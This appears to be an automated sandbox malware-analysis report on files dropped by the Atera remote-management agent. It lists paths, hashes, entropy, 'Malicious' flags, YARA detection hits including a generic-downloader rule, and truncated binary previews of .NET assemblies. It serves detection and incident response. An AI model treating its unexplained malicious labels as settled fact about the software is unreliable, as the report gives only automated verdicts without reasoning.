                                                                                                                                                                                                                                        SSDEEP:12288:v5douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUF1:vpjblhW1V
                                                                                                                                                                                                                                        MD5:D8C8189A5DD97106CCEBA79018923673
                                                                                                                                                                                                                                        SHA1:007AA2E568044189342BD978402651407B2A48A3
                                                                                                                                                                                                                                        SHA-256:C84CA9E85E70A5E633154275FBA1A493CF6BF69B5E6004004A957675C750B56C
                                                                                                                                                                                                                                        SHA-512:3B47301F035FF31CA9B2B2E516DFDFC9BCE210245BA7F1488BD19432100936B959182FE4C29109D962ABA133C6B2010BDCFA5CF70678FAF928F914E370C66BCB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d.........." ..0..8...........T... ...`....... ...............................S....`..................................T..O....`..p............B..((..........XS............................................... ............... ..H............text... 6... ...8.................. ..`.rsrc...p....`.......:..............@..@.reloc...............@..............@..B.................T......H........X..\V.................R......................................:.(;.....}....*..{....*:.(;.....}....*..{....*...0...........~<...}.....r...p}........(.....(.....(.....r)..p.(........(u.....~<...(=...,z.....s....}.......}.......}............{............%......(>....%...D....%...!....%...%.........%....%.........s....(B...*vra..p.(....,...}....*..}....*..{....*vr...p.(....,...}....*..}....*..{....*z.{....,......(>...o?...s@...z*.0..(........{....-..(......o....&....(j

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64040
                                                                                                                                                                                                                                        Entropy (8bit):6.266720718777246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:FYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zlDW:FKC9niwOepJ6TJPeb6NIUFg76KzI
                                                                                                                                                                                                                                        MD5:54BA7A33F778C14C858F8478AA7CE11F
                                                                                                                                                                                                                                        SHA1:287A7666FE9DE62906A17853AF367E9C280EE047
                                                                                                                                                                                                                                        SHA-256:81242FBCCD00F783E4CB57D7A77720E0D361609B9E3443F1F4FBD53549180CF5
                                                                                                                                                                                                                                        SHA-512:7582EE39AF42C9C8355B4A66C299A6F51061C5ADE5CBFA2A0DA07D8D3898E30A227CFAFA976630D8EDE2638F48E63E2D8A4150E9CB4C6CCD94315094EAA62B7B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@............`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142376
                                                                                                                                                                                                                                        Entropy (8bit):6.160884096361585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:vUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqk:2BFd3/aFs2x
                                                                                                                                                                                                                                        MD5:7B46A38CB34CF7129A501D114EED91A7
                                                                                                                                                                                                                                        SHA1:FE284056CDF1079D4AA46EFA0EEA09DC158671D8
                                                                                                                                                                                                                                        SHA-256:0AEDF8E33279A9A9F026EF5000919A1BA38F105B0C3CEE7F6AC3628E1CE441EC
                                                                                                                                                                                                                                        SHA-512:B16BE5B7DFAE0AE5455976B0353D7368FBB080BA4DC85CA4FD56FA01C64DE5E7572196A16992C259C1442EA2D30F212E8D08F7D8F258ADACFBF9D3014CFC2394
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`...........@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110120
                                                                                                                                                                                                                                        Entropy (8bit):5.510686089319165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76k:gWw0SUUKBM8aOUiiGw7qa9tK/Yb/
                                                                                                                                                                                                                                        MD5:0AFC00C0FABFB019074DA907FE70317A
                                                                                                                                                                                                                                        SHA1:B6F8FA76424F44B0EA2FB54A17C84628CDB9B22C
                                                                                                                                                                                                                                        SHA-256:75D8D4D4C7FDCDABC5FBFF18935783A23E0951897B9990339C1B2ECA82F90BAE
                                                                                                                                                                                                                                        SHA-512:43563466B6A356B70717CA53C71D33165B646CA3C6E5771BEFBD08DBA611E791690A0BCEF6F9B3F773265C5C0177BF723046D05C7B18999D0F59C6797D55B8E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................B.....@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17960
                                                                                                                                                                                                                                        Entropy (8bit):6.673799804528098
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/h06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeB1evuWj:/y9gpEpYi60A8
                                                                                                                                                                                                                                        MD5:3699832767ACE8B12E18E10C5ED33469
                                                                                                                                                                                                                                        SHA1:1500E3F31786CB63AB2D5FCD71542D24829B9C6A
                                                                                                                                                                                                                                        SHA-256:FA9B02A2EDB45564D38EAEC7C85AAE9B2B6D6A04BA32FEAA771C0812DC85EE79
                                                                                                                                                                                                                                        SHA-512:2FC97EC4F1FA5486C98FBFF3612BE4AA43D774BC5CD961AB7036F3AB067E4771DEA73FDA22B191B65B3362196FC958FBF1279B2BC4A5D4C1346335D30A5BC333
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19496
                                                                                                                                                                                                                                        Entropy (8bit):6.524234329265897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:LyPa16oAL4D+wW9IWmDIW4IWYDa9Nyb8E9VF6IYijSJIVxFZJr:LWs6oqDjADKeDa5EpYi609r
                                                                                                                                                                                                                                        MD5:84E608824D1DE2D0CC7B3C7072F86CAE
                                                                                                                                                                                                                                        SHA1:57A2B02945E478CBC0EA3DBC7CF4041762718EB1
                                                                                                                                                                                                                                        SHA-256:D2163CA69AA96A2DD6277CDF6BB1990758C677EF7259255995E448F18E1ACA99
                                                                                                                                                                                                                                        SHA-512:09E53F0546218D07C79E8436504097176910A909DD39814A062F19522B33334754F8BAC9F2BB03AC785B9E2463F3E24C12376A601642BC83BCE26D285AE19738
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ...................................@..................................2..O....@...............$..((...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41512
                                                                                                                                                                                                                                        Entropy (8bit):6.409217717758582
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ljfAw5tisN7Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3UpoztjxFUNyb8E9VF6IYijW:lksN74GX7nwOa5VS2ozdxFUEpYi60SXr
                                                                                                                                                                                                                                        MD5:5E0E85A164AA504598B5121AE6B33F4F
                                                                                                                                                                                                                                        SHA1:C2372406F7131D72376CA55B28788049A6FE8EB6
                                                                                                                                                                                                                                        SHA-256:DE2BE1CFE0E784D1FA5FAAF35C6671EA8FE50DC261562570415374DC75D77FB7
                                                                                                                                                                                                                                        SHA-512:3B19E86CCDAEB4F5F4ABDF32EAC26708C2B01C6D6DBABCE318E31C0E882C086DB6E76730DE4853302D768E2F4FBB0457347BA4D5642EBB512F14A4563D9B7AF4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg.........."...0..n..........r.... ........@.. ...............................@....`................................. ...O....................z..((.......................................................... ............... ..H............text...xm... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B................T.......H........!...............1..@Z............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rY..p~....o....t....*.~....*..(....*Vs....(....t.........*.(.....(....(......,....s....o....*(....*.0..........(....o ...rm..p(!...(".....'...%.. .o#......i./..|s$......)...(.......(%....)...o&.......o'......i.0..+....o(......i.0..+....o)......i....+....o*...s+....o,.....,..(-.....&..*..................0..........(.... ....`(/.....&.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):78888
                                                                                                                                                                                                                                        Entropy (8bit):6.0692535230722235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:r7gzIBxkogIFNU1vTGGsUTcvMOkrIB76hB:rRBxnP25sUTcvwrIBk
                                                                                                                                                                                                                                        MD5:A9F0A629B9676577360E342A81A995AC
                                                                                                                                                                                                                                        SHA1:1877BB7196654D65EB536CF5785F9EA45C92C2CD
                                                                                                                                                                                                                                        SHA-256:01E666A5B281C046830567860D3BBB7BF7FA57A991937BAE0F0F229ABCE0CDAF
                                                                                                                                                                                                                                        SHA-512:34FF88D512AA26332F3497173217E2070F245E132C9ED66EE07F97CBCA0CB3BB133831E2B12AE8472240175BF0C60DCD4A30B83864AEDF505C1D7CEFEDAC16CC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3./..........." ..0.............>!... ...@....... ..............................VC....`.................................. ..O....@..................((...`......4 ..8............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H........X..h............................................................0..........(....(.....r...p... .....r...p..(......o......(.....o......(.....o..........s......[o......s....%.o........o .....s!..........s"...%......io#...o$.....o%...(&.........,...o'......*......y.,........0..........(....(.....r...p... .....r...p..(......o......(.....o.......((.........s......[o......s....%.o........o).......s*..........s"......i.k...........io+.....(.........o,.........,...o'......*.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):953
                                                                                                                                                                                                                                        Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                        MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                        SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                        SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                        SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350760
                                                                                                                                                                                                                                        Entropy (8bit):2.9056808142849144
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eO11uSb/jb5JEH8VAynnnnnnnnnnnnnnn82cB:55M
                                                                                                                                                                                                                                        MD5:7F124B21745B25F3F012A455BE67E4BA
                                                                                                                                                                                                                                        SHA1:DB9F15D7230544B804E6B705E2186655E1890C85
                                                                                                                                                                                                                                        SHA-256:D23D9977B25BC0AC9713DE0CAAB77A4B089D80D513DA9F373BA76795A0188E0C
                                                                                                                                                                                                                                        SHA-512:0092A8554A89AAB856CAB81490EED10E38F374F7E3556623E96715066BA1A6549F33218E5E600652B1D06559B6A617A08311D8BB687D22BC65253DECA9B6CF14
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg.........."...0......d......>.... ........@.. ....................................`.....................................O........a...........2..((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc....a.......b..................@..@.reloc...............0..............@..B................ .......H........*...%..........TP..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....p...(....,.(....+*(.....X...(......,..(.... ....(....+..8...s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,......(....,......(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*...r]..pr...p(....( ...((....C..r...p(....(+...((...(....rA..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe.config (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1786
                                                                                                                                                                                                                                        Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                        MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                        SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                        SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                        SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350760
                                                                                                                                                                                                                                        Entropy (8bit):2.9056808142849144
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eO11uSb/jb5JEH8VAynnnnnnnnnnnnnnn82cB:55M
                                                                                                                                                                                                                                        MD5:7F124B21745B25F3F012A455BE67E4BA
                                                                                                                                                                                                                                        SHA1:DB9F15D7230544B804E6B705E2186655E1890C85
                                                                                                                                                                                                                                        SHA-256:D23D9977B25BC0AC9713DE0CAAB77A4B089D80D513DA9F373BA76795A0188E0C
                                                                                                                                                                                                                                        SHA-512:0092A8554A89AAB856CAB81490EED10E38F374F7E3556623E96715066BA1A6549F33218E5E600652B1D06559B6A617A08311D8BB687D22BC65253DECA9B6CF14
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg.........."...0......d......>.... ........@.. ....................................`.....................................O........a...........2..((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc....a.......b..................@..@.reloc...............0..............@..B................ .......H........*...%..........TP..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....p...(....,.(....+*(.....X...(......,..(.... ....(....+..8...s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,......(....,......(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*...r]..pr...p(....( ...((....C..r...p(....(+...((...(....rA..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1786
                                                                                                                                                                                                                                        Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                        MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                        SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                        SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                        SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
